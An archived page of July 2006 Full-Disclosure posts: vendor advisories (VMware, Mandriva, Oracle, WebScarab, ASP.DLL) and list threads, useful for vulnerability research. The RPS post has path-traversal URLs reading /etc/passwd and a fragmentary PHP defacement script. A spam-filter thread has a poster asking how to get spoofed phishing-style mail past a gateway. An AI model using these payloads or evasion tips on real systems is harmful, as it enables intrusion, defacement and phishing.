[Full-disclosure] VMSA-2006-0003 VMware possible incorrect permissions on SSL key files
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- VMware Security Advisory Advisory ID: VMSA-2006-0003 Synopsis: VMware possible incorrect permissions on SSL key files VMware Player for Linux VMware Workstation for Linux VMware Server for Linux VMware ESX Server 2.x VMware Infrastructure 3 NOT VULNERABLE: VMware Player for Windows NOT VULNERABLE: VMware Workstation for Windows NOT VULNERABLE: VMware Server for Windows VMTN Knowledge Base URL: http://kb.vmware.com/kb/2467205 Issue date:2006-07-18 Updated on:2006-07-18 CVE Name: CVE-2006-3589 - --- 1. Summary: The configuration program, vmwareconfig.pl, may not correctly set file permissions on the generated SSL Key files which is used for encrypting traffic for remote administrative connections. VMware has given this issue a Priority 3 severity rating. 2. Relevant release: VMware Player for Linux VMware Workstation for Linux VMware Server for Linux VMware Infrastructure 3 NOT VULNERABLE: VMware Player for Windows NOT VULNERABLE: VMware Workstation for Windows NOT VULNERABLE: VMware Server for Windows 3. Problem description: The script vmware-config.pl sets permissions on the key and certificate files to safe values. However this script does not use the safe_chmod() subroutine which reports errors on failure. Instead, the native Perl chmod() function is used, without any return code checking. Because the safe_chmod() subroutine is not used and no return code checks are performed, the user is not alerted if the chmod() fails. Depending on the umask being used at the time this could leave the key file readable to any local user on the system. 4. Solution: VMware is working on a fix, and there is a workaround. Manually change the permissions on the key and certificate to its intended values. The following commands would be appropriate on a default installation: # chmod 400 /etc/vmware/ssl/rui.key # chmod 444 /etc/vmware/ssl/rui.crt The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-3589 to this issue. 5. References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589 6. Acknowledgments VMware would like to thank Nick Breese and security-assessment.com. 7. Contact: http://www.vmware.com/security Copyright 2006 VMware Inc. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFErFC+LsZLrftG15MRAmm8AKCj6Li52ztaGuPO78GyqXWaQSLTRgCaAnj3 3Wg2D5U/S9SkrzDSTR9OsWI= =wppd -END PGP SIGNATURE- -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- VMware Security Advisory Advisory ID: VMSA-2006-0003 Synopsis: VMware possible incorrect permissions on SSL key files VMware Player for Linux VMware Workstation for Linux VMware Server for Linux VMware ESX Server 2.x VMware Infrastructure 3 NOT VULNERABLE: VMware Player for Windows NOT VULNERABLE: VMware Workstation for Windows NOT VULNERABLE: VMware Server for Windows VMTN Knowledge Base URL: http://kb.vmware.com/kb/2467205 Issue date:2006-07-18 Updated on:2006-07-18 CVE Name: CVE-2006-3589 - --- 1. Summary: The configuration program, vmwareconfig.pl, may not correctly set file permissions on the generated SSL Key files which is used for encrypting traffic for remote administrative connections. VMware has given this issue a Priority 3 severity rating. 2. Relevant release: VMware Player for Linux VMware Workstation for Linux VMware Server for Linux VMware Infrastructure 3 NOT VULNERABLE: VMware Player for Windows NOT VULNERABLE: VMware Workstation for Windows NOT VULNERABLE: VMware Server for Windows 3. Problem description: The script vmware-config.pl sets permissions on the key and certificate files to safe values. However this script does not use the safe_chmod() subroutine which reports errors on failure. Instead, the native Perl chmod() function is used, without any return code checking. Because the safe_chmod() subroutine is not used and no return code checks are performed, the user is not alerted if the chmod() fails. Depending on the umask being used at the time this could leave the key file readable to any local user on the system. 4. Solution: VMware is working on a fix, and there is a workaround. Manually change the permissions
[Full-disclosure] ASP.DLL Include File Buffer Overflow
= ASP.DLL Include File Buffer Overflow = = MS Bulletin posted: = http://www.microsoft.com/technet/security/Bulletin/MS06-034.mspx = = Affected Software: =IIS 5.0 =IIS 5.1 =IIS 6.0 = = Public disclosure on July 19, 2006 == Overview == A buffer overflow exists in ASP.DLL that can be exploited by creating a .asp file containing a parameter for the include SSI command. OVERFLOWDATA The include function in ASP.DLL, checks if the parameter is longer than 260 bytes. If it is then an error is caused, but before causing the error a miscalculated copy is done. mov edi, [ebp+var_228] ; load length of parameter cmp edi, 104h; check if larger than 260 bytes jbe short loc_ mov esi, [ebp+var_22C] ; load address of parameter lea eax, [edi+esi-104h] ; load eax with the address of the last ; 260 bytes of the parameter ; (length of string+source of string)- 104h lea edx, [ebp+var_211] ; load edx with address on stack sub edx, eax ; mov cl, [eax]; \ mov [edx+eax], cl; do the copy inc eax ; and overflow the stack testcl, cl ; / jnz short loc_7096D1F3 ; Funnily enough, the solution was to remove this copy as the resulting data was never actually used. == Exploitation == Exploitation requires the ability to upload or somehow create a file with a .asp extension in a folder that will allow .asp processing. Since ASP.DLL usually runs under the IWAM_ account, there is no privilege escalation through this vulnerability. It is however possible to bypass any security restrictions enforced by ASP. It also allows for the execution of APIS that have no ASP equivalent. == Solutions == - Install the vendor supplied patch. == Credit == Discovered and advised to Microsoft February, 2006 by Brett Moore of Security-Assessment.com Same Bug Different App http://www.security-assessment.com/Presentations/SBDA_Ruxcon_2005.ppt In memory of; http://www.nsfocus.com/english/homepage/research/0305.htm and http://www.eeye.com/html/research/advisories/AD20001003.html == About Security-Assessment.com == Security-Assessment.com is a leader in intrusion testing and security code review, and leads the world with SA-ISO, online ISO17799 compliance management solution. Security-Assessment.com is committed to security research and development, and its team have previously identified a number of vulnerabilities in public and private software vendors products. -- This message has been scanned for viruses and dangerous content by Bizo Email Filter, and is believed to be clean. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple Vulnerabilities RPS
Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system)# # # Author: 0o_zeus_o0 ( Arturo Z. )# Contact: [EMAIL PROTECTED]# Website: www.elitemexico.org# Date: 18/07/06# Risk: medium# Vendor Url: http://rps.rigtersir.com/ # Affected Software: RPS# Non Affected: RPS V 4##Info:###UPLOAD FILES# it allows the user to raise archives without having administration privileges ###SQL inyección#it allows the user to insert post without having to be admin with this can make xss or #HTML injection###example of upload files## ##http://www.vuln.com/[path]/adm/photos/images.php##http://www.vuln.com/[path]//adm/down/files.phpexample Remote Execution http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd##http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index #Solution:#VULNERABLE VERSIONS## # v1.0, 2.0 3.0Contact information#0o_zeus_o0#zeus@diosdelared.com#www.elitemexico.org ###greetz: lady fire,Mi beba, olimpus klan team and elitemexico# #Original Advisory: http://zeus.pccentervillaflores.com//13.txt ##SQL inyección in "Articulos" exploit/*RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•Date: 08/01/06 Website: www.elitemexico.org*/?>RPS Defacer RPS Defacer0o_ZEUS_o0 OliMpusKlaN •~ FX ~• Direccion: Autor: Email: Titulo: Contenido: (Soporta HTML Inyection) if($action="">$web= $_POST['url'];echo "
var pagina=\"$web/adm/add_art.php\"
function redireccionar()
{
location.href="">}
setTimeout (\"redireccionar()\", 0001);
";}?> ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: FW: [Full-disclosure] Symantec 3300 E-mail Gateway dropping spoofedmails
Posted inline:On 7/19/06, Josh L. Perrymon < [EMAIL PROTECTED]> wrote:> This email gateway is blocking email messages spoofed from my RH3> box...>> >> The error message:> X-NAI-Spam-Level: ** > X-NAI-Spam-Score: 2.3> X-NAI-Spam-Report: 2 Rules triggered * 1.8 -- MIME_MISSING_BOUNDARY> --> RAW: MIME section missing boundary * 0.5 -- MIME_BASE64_LATIN -- RAW:> Latin alphabet text using base64 encodi: > < end snip WTF?>> Never had this message before... The gateway didn't pickup on spoofed> senders or content. Just some weird message about Latin Alphabet and > MIME section missing boundary?>>> Anyone seen this before? Is this a .conf setting on my *nix mail> server?or could it be that the errors that it is reporting are actually true? it seems strange for you to suddenly decide that this specific error messagesomehow indicates the server is blocking your box. what made you come tothis wild conclusion?-- mic This message is from the remote Symantec EMail gateway and it blocks spoofed emails sent from my linux box. This is the first time a email/spam filter has detected one of these spoofed emails from my *nix box so I'm trying to figure what is different. --Why this was triggered?... --What I can do to bypass it next time..- Why did Symantecs box detect this and others havent? JP ___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symantec 3300 E-mail Gateway dropping spoofed mails
On 7/19/06, Josh L. Perrymon <[EMAIL PROTECTED]> wrote: This email gateway is blocking email messages spoofed from my RH3 box... The error message: X-NAI-Spam-Level: ** X-NAI-Spam-Score: 2.3 X-NAI-Spam-Report: 2 Rules triggered * 1.8 -- MIME_MISSING_BOUNDARY -- RAW: MIME section missing boundary * 0.5 -- MIME_BASE64_LATIN -- RAW: Latin alphabet text using base64 encodi: < end snip > WTF? Never had this message before... The gateway didn't pickup on spoofed senders or content. Just some weird message about Latin Alphabet and MIME section missing boundary? Anyone seen this before? Is this a .conf setting on my *nix mail server? or could it be that the errors that it is reporting are actually true? it seems strange for you to suddenly decide that this specific error message somehow indicates the server is blocking your box. what made you come to this wild conclusion? -- mic ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Symantec 3300 E-mail Gateway dropping spoofed mails
This email gateway is blocking email messages spoofed from my RH3 box...The error message:X-NAI-Spam-Level: ** X-NAI-Spam-Score: 2.3 X-NAI-Spam-Report: 2 Rules triggered * 1.8 -- MIME_MISSING_BOUNDARY -- RAW: MIME section missing boundary * 0.5 -- MIME_BASE64_LATIN -- RAW: Latin alphabet text using base64 encodi:< end snip >WTF?Never had this message before... The gateway didn't pickup on spoofed senders or content. Just some weird message about Latin Alphabet and MIME section missing boundary? Anyone seen this before? Is this a .conf setting on my *nix mail server?< full error>Received: from target.system.com ([X.X>X>X>) by target.system.com (Sun Java System Messaging Server 6.2-4.03 (built Sep 22 2005)) with SMTP id <[EMAIL PROTECTED]> for [EMAIL PROTECTED]; Tue, 18 Jul 2006 11:45:21 +1000 (EST)Received: from MI.ISP.( x.x.x.x) by target.email.server via smtp id 059c_11c238_1652_11db_97c3_00142279d9aa; Tue, 18 Jul 2006 21:39:29 +1000 Received: from nobody by hostingcmopanby.com with local (Exim 4.52) id 1G2eVs-0004X9-Ou for [EMAIL PROTECTED] ; Tue, 18 Jul 2006 11:36:40 +1000Date: Tue, 18 Jul 2006 11:36:40 +1000From: Spoofed Support Dept <[EMAIL PROTECTED]>Subject: [spam] Attention: Messenger Express Upgrade- Requires Action To: [EMAIL PROTECTED]Message-id: <[EMAIL PROTECTED]>MIME-version: 1.0Content-type: multipart/alternative; boundary=HTMLDEMO44bc3b28b4ba5 X-AntiAbuse: This header was added to track abuse, please include it with any abuse reportX-AntiAbuse: Primary Hostname -REMOVEDX-AntiAbuse: Original Domain - REMOVEDX-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12] X-AntiAbuse: Sender Address Domain - REMOVEDX-Source:X-Source-Args:X-Source-Dir:X-NAI-Spam-Level: **X-NAI-Spam-Score: 2.3X-NAI-Spam-Report: 2 Rules triggered * 1.8 -- MIME_MISSING_BOUNDARY -- RAW: MIME section missing boundary * 0.5 -- MIME_BASE64_LATIN -- RAW: Latin alphabet text using base64 encodiOriginal-recipient: rfc822;removed@removed.comThis is a MIME encoded message.--HTMLDEMO44bc3b28b4ba5 Content-Type: text/html; charset=ISO-8859-1Content-Transfer-Encoding: base64DQoNCkF0dGVudGlvbiBFbWFpbCBVc2Vycyw8YnI+DQo8YnI+DQpEdWUgdG8gcmVjZW50IHNlDQoNCkF0dGVudGlvbiBFbWFpbCBVc2Vycyw8YnI+DQo8YnI+Y3Vy (snipped)cm8uZ292LmF1IDxicj4NCg0KDQo=< end full >Cheers,JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:128 ] - Updated wireshark packages fix numerous vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:128 http://www.mandriva.com/security/ ___ Package : wireshark Date: July 18, 2006 Affected: 2006.0 ___ Problem Description: A number of vulnerabilities have been discovered in the Wireshark (formerly Ethereal) network analyzer. These issues have been corrected in Wireshark version 0.99.2 which is provided with this update. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3627 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3628 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3629 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3630 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3631 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3632 http://www.wireshark.org/security/wnpa-sec-2006-01.html ___ Updated Packages: Mandriva Linux 2006.0: 19db98ffa6a1cfb9cc5470abc643f72a 2006.0/RPMS/libwireshark0-0.99.2-0.2.20060mdk.i586.rpm e4574371aa3f0bc1845d82a130bf6f4b 2006.0/RPMS/tshark-0.99.2-0.2.20060mdk.i586.rpm 54b30ad47d17134a6891c6b7c1810b18 2006.0/RPMS/wireshark-0.99.2-0.2.20060mdk.i586.rpm 03c7673e7f4efd24854c4d51dff87cab 2006.0/RPMS/wireshark-tools-0.99.2-0.2.20060mdk.i586.rpm 14c59524c2a536634385791902ef53a4 2006.0/SRPMS/wireshark-0.99.2-0.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 18dbc67899b2c023af06524a67b2d07a x86_64/2006.0/RPMS/lib64wireshark0-0.99.2-0.2.20060mdk.x86_64.rpm b5187418a5f9ab70a59eddb3611f0b15 x86_64/2006.0/RPMS/tshark-0.99.2-0.2.20060mdk.x86_64.rpm f98f5805acf0756ce762e6b10af81506 x86_64/2006.0/RPMS/wireshark-0.99.2-0.2.20060mdk.x86_64.rpm da05fcb2a00bf682c85da21159fd3af0 x86_64/2006.0/RPMS/wireshark-tools-0.99.2-0.2.20060mdk.x86_64.rpm 14c59524c2a536634385791902ef53a4 x86_64/2006.0/SRPMS/wireshark-0.99.2-0.2.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEvVp1mqjQ0CJFipgRAqpxAJ9fAQNXIFh65twMu3Q9c1jK5XUCJACZAeLX M3e2Dpv4v3glOdT6hIB2HqI= =SKwo -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:127 ] - Updated gimp packages fix buffer overflow vulnerability.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:127 http://www.mandriva.com/security/ ___ Package : gimp Date: July 18, 2006 Affected: 2006.0 ___ Problem Description: A buffer overflow in the xcf_load_vector function in app/xcf/xcf-load.c for gimp 2.2.x allows user-complicit attackers to cause a denial of service (crash) and possibly execute arbitrary code via an XCF file with a large num_axes value in the VECTORS property. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3404 ___ Updated Packages: Mandriva Linux 2006.0: ef770a8f1e5b894589b8f591486e00b9 2006.0/RPMS/gimp-2.2.8-6.1.20060mdk.i586.rpm f39e2f6d7bd2e88e47b696b58aa8023b 2006.0/RPMS/gimp-python-2.2.8-6.1.20060mdk.i586.rpm 465e5b21384bc501d2e991922695811f 2006.0/RPMS/libgimp2.0_0-2.2.8-6.1.20060mdk.i586.rpm 1df661eb0a251358f5bc7c6e35929b71 2006.0/RPMS/libgimp2.0-devel-2.2.8-6.1.20060mdk.i586.rpm 708dd714d5514cfb89a947bca6604b73 2006.0/SRPMS/gimp-2.2.8-6.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 20fe9e1f09f22f770c608303edfad886 x86_64/2006.0/RPMS/gimp-2.2.8-6.1.20060mdk.x86_64.rpm a61b7e401cf01bb3715702d557b0fca6 x86_64/2006.0/RPMS/gimp-python-2.2.8-6.1.20060mdk.x86_64.rpm e1d614c2befbec26c478eb1303ad887e x86_64/2006.0/RPMS/lib64gimp2.0_0-2.2.8-6.1.20060mdk.x86_64.rpm 8b7168186005e221d8aa58d37349d36d x86_64/2006.0/RPMS/lib64gimp2.0-devel-2.2.8-6.1.20060mdk.x86_64.rpm 708dd714d5514cfb89a947bca6604b73 x86_64/2006.0/SRPMS/gimp-2.2.8-6.1.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEvVPXmqjQ0CJFipgRAnbwAKDawaKqriv1sTg+ZtwxXTnzJRz6dwCgxtWO xmdCxTsvu/feOQNxMCxrcBY= =LVOr -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:126 ] - Updated libtunepimp packages fixes buffer overflow vulnerabilities.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:126 http://www.mandriva.com/security/ ___ Package : libtunepimp Date: July 18, 2006 Affected: 2006.0 ___ Problem Description: Kevin Kofler discovered multiple stack-based buffer overflows in the LookupTRM::lookup function in libtunepimp 0.4.2 that allow remote user-complicit attackers to cause a denial of service (application crash) and possibly execute code via a long (1) Album release date (MBE_ReleaseGetDate), (2) data, or (3) error strings. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3600 ___ Updated Packages: Mandriva Linux 2006.0: fdb516cf3dea20bf1d88fdbfd14c6d5c 2006.0/RPMS/libtunepimp2-0.3.0-3.2.20060mdk.i586.rpm 5e10b7d6d6455c3b7be8a8cc21957f04 2006.0/RPMS/libtunepimp2-devel-0.3.0-3.2.20060mdk.i586.rpm 3eb6321a88393a9614346a7104eba2b5 2006.0/RPMS/libtunepimp2-static-devel-0.3.0-3.2.20060mdk.i586.rpm 5dbdeb4ee582712d8fc368d37b6a0174 2006.0/RPMS/libtunepimp2-utils-0.3.0-3.2.20060mdk.i586.rpm 05b7eb248b94c2782ae877304bdc09d2 2006.0/SRPMS/libtunepimp-0.3.0-3.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: bce87a055a585ea8591cfefe5da6c6cb x86_64/2006.0/RPMS/lib64tunepimp2-0.3.0-3.2.20060mdk.x86_64.rpm 20a641a6086e7a752b4f52be49dc743a x86_64/2006.0/RPMS/lib64tunepimp2-devel-0.3.0-3.2.20060mdk.x86_64.rpm 14cb96ff49c1607c6ddc58c097bce42f x86_64/2006.0/RPMS/lib64tunepimp2-static-devel-0.3.0-3.2.20060mdk.x86_64.rpm b8910c32850f889d310cc66d7c03f99e x86_64/2006.0/RPMS/lib64tunepimp2-utils-0.3.0-3.2.20060mdk.x86_64.rpm 05b7eb248b94c2782ae877304bdc09d2 x86_64/2006.0/SRPMS/libtunepimp-0.3.0-3.2.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEvVOqmqjQ0CJFipgRAmT/AJwN6lZ2N9vVrCTCfeu+P4GCqYrvWACfbQWw ymaorFMK/yxskvkYtm/e7XI= =AIkB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:125 ] - Updated webmin packages fix arbitray file read vulnerability.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:125 http://www.mandriva.com/security/ ___ Package : webmin Date: July 18, 2006 Affected: 2006.0, Corporate 3.0 ___ Problem Description: Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files. NOTE: This is a different issue than CVE-2006-3274. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3292 ___ Updated Packages: Mandriva Linux 2006.0: b389424c7b84f96e37c0db9dcb3e9b01 2006.0/RPMS/webmin-1.220-9.4.20060mdk.noarch.rpm eb4ea546b5d8a4a8401ddba2eee04aea 2006.0/SRPMS/webmin-1.220-9.4.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: b389424c7b84f96e37c0db9dcb3e9b01 x86_64/2006.0/RPMS/webmin-1.220-9.4.20060mdk.noarch.rpm eb4ea546b5d8a4a8401ddba2eee04aea x86_64/2006.0/SRPMS/webmin-1.220-9.4.20060mdk.src.rpm Corporate 3.0: 9c95b1373fe69a80ebfe6262921fcc52 corporate/3.0/RPMS/webmin-1.121-4.6.C30mdk.noarch.rpm fc39f0e98dc5dcece871c18f7a1f3e09 corporate/3.0/SRPMS/webmin-1.121-4.6.C30mdk.src.rpm Corporate 3.0/X86_64: 9c95b1373fe69a80ebfe6262921fcc52 x86_64/corporate/3.0/RPMS/webmin-1.121-4.6.C30mdk.noarch.rpm fc39f0e98dc5dcece871c18f7a1f3e09 x86_64/corporate/3.0/SRPMS/webmin-1.121-4.6.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEvVKCmqjQ0CJFipgRAmWyAKDk9ix6E2OrinJ/ShfDTY/FFrcH7wCgyu5Y jO9m/w0DvTI55SpdrW0HDq0= =SZvB -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux Privilege Escalation exploits
It is better to provide concise, complete, and accurate information about vectors of attack and the potential results of those attacks to allow people to make their own decisions. Ratings are useful assuming they use distribution of the software and the potential for damage as the biggest factors. This information gives you an idea of how big an impact it could have and how many computers are affected. You could let people decide for themselves, but the amount of alerts is too overwhelming for most people and it makes sense to limit what they can see based on the risk it causes to them based on an estimated threat level for the bigger picture. feofil ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New PowerPoint Trojan installs itself as LSP
It appears that there is a new type of PowerPoint 0-day Trojan spreading, more details at this write-up: http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2 006-071812-3213-99 What the technical details section says is: "Installs the file SNootern.dll as a layered service provider (LSP)" Wikipedia has only stub type article http://en.wikipedia.org/wiki/Layered_Service_Provider Is this 'mechanism' very common and is it difficult to detect by AV? This new Trojan entitled as Riler.F opens a back door and tries to connect to 8800.org, earlier Bifrose Trojan uses (or used) this domain too. There is a new C variant of Trojan.PPDropper as well, but no information about the file name of PowerPoint attachment etc. Symantec reports Infection Length as 220,160 bytes, same as used by Trojan.PPDropper.B. This size information is from Trojan description of another vendor, however. This summary has been updated to related PowerPoint 0-day FAQ document. Regards, Juha-Matti http://blogs.securiteam.com/index.php/archives/author/juha-matti/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WebScarab <= 20060621-0003 cross site scripting
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SA0012 + + WebScarab Cross Site Scripting + + PUBLISHED ON Jul 18, 2006 PUBLISHED AT http://moritz-naumann.com/adv/0012/webscarabxss/0012.txt http://moritz-naumann.com/adv/0012/webscarabxss/0012.txt.gpg PUBLISHED BY Moritz Naumann IT Consulting & Services Hamburg, Germany http://moritz-naumann.com/ SECURITY at MORITZ hyphon NAUMANN d0t COM GPG key: http://moritz-naumann.com/keys/0x277F060C.asc AFFECTED APPLICATION OR SERVICE WebScarab http://www.owasp.org/index.php/OWASP_WebScarab_Project http://sourceforge.net/projects/owasp/ WebScarab is a Free Software for manual and semi-automatic web application penetration testing. It is developed in Java by Rogan Dawes as part of the Open Web Application Security Project (OWASP). AFFECTED VERSIONS Version 20060621-0003 and below ISSUES WebScarab is subject to a client side script code injection vulnerability which may allows for running cross site scripting attacks against web clients connecting through it. + 1. Cross Site Scripting vulnerability in error messages By accessing the following URI using a web browser which is prone to this issue and configured to proxy through a vulnerable version of WebScarab, a non-persitent web script injection can be achieved: http://arbitrary.domain/alert(0); This allows for disclosure of sensitive data stored in the security context of any arbitrary domain which the web browser has previously accessed but WebScarab is not able to access by the time the attack takes place (due to invalid upstream proxy setting on WebScarab, different results of DNS queries, limited connectivity or other reasons). Ms Internet Explorer 6 SP2 and Konqueror 3.5.3 are known to be prone to this issue. This problem is caused by insufficient santitation of user supplied input before it is returned to the client as part of an error message. BACKGROUND Cross Site Scripting (XSS): Cross Site Scripting, also known as XSS or CSS, describes the injection of malicious content into output produced by a web application. A common attack vector is the inclusion of arbitrary client side script code into the applications' output. Failure to completely sanitize user input from malicious content can cause a web application to be vulnerable to Cross Site Scripting. http://en.wikipedia.org/wiki/XSS http://www.cgisecurity.net/articles/xss-faq.shtml WORKAROUNDS Client: Disable Javascript. Server: None known. SOLUTIONS Rogan Dawes has released version 20060718-1904 today. This version fixes this issue. The updated packages is available at http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61823 TIMELINE Jul 18, 2006: Discovery, code maintainer notification Jul 18, 2006: Code maintainer provides fix Jul 18, 2006: Public advisory REFERENCES N/A ADDITIONAL CREDIT N/A LICENSE Creative Commons Attribution-ShareAlike License Germany http://creativecommons.org/licenses/by-sa/2.0/de/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEvVpon6GkvSd/BgwRArImAJ4wq5+KO9B8Lt/QT7gaCc+zDhAH0QCfe0pY 8lOADqs+qmKzqw0cgeb3HWU= =32H+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle Database - SQL Injection in SYS.KUPW$WORKER [DB03]
NameSQL Injection in package SYS.KUPW$WORKER (6980775) [DB03] Systems Oracle 10g Release 1 SeverityHigh Risk CategorySQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory18 Jul 2006 (V 1.00) Advisory http://www.red-database-security.com/advisory/oracle_sql_injection_kupw$ worker.html Details ### The package SYS.KUPW$WORKER contains a SQL injection vulnerability in the MAIN procedure. This procedure is granted to PUBLIC by default. Oracle fixed this vulnerability with the package dbms_assert. To exploit this vulnerability it is necessary to have the privilege to create a PL/SQL-function. Patch Information # Apply the patches for Oracle CPU July 2006 on top of Oracle 10g Release 1. History ### 01-nov-2005 Oracle secalert was informed 02-nov-2005 Bug confirmed 18-jul-2006 Oracle published CPU July 2006 [DB03] 18-jul-2006 Advisory published Additional Information ## An analysis of the Oracle CPU July 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_july_2006.html This document will be updated during the next few days and weeks with the latest information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle Database - SQL Injection in SYS.DBMS_STATS [DB21]
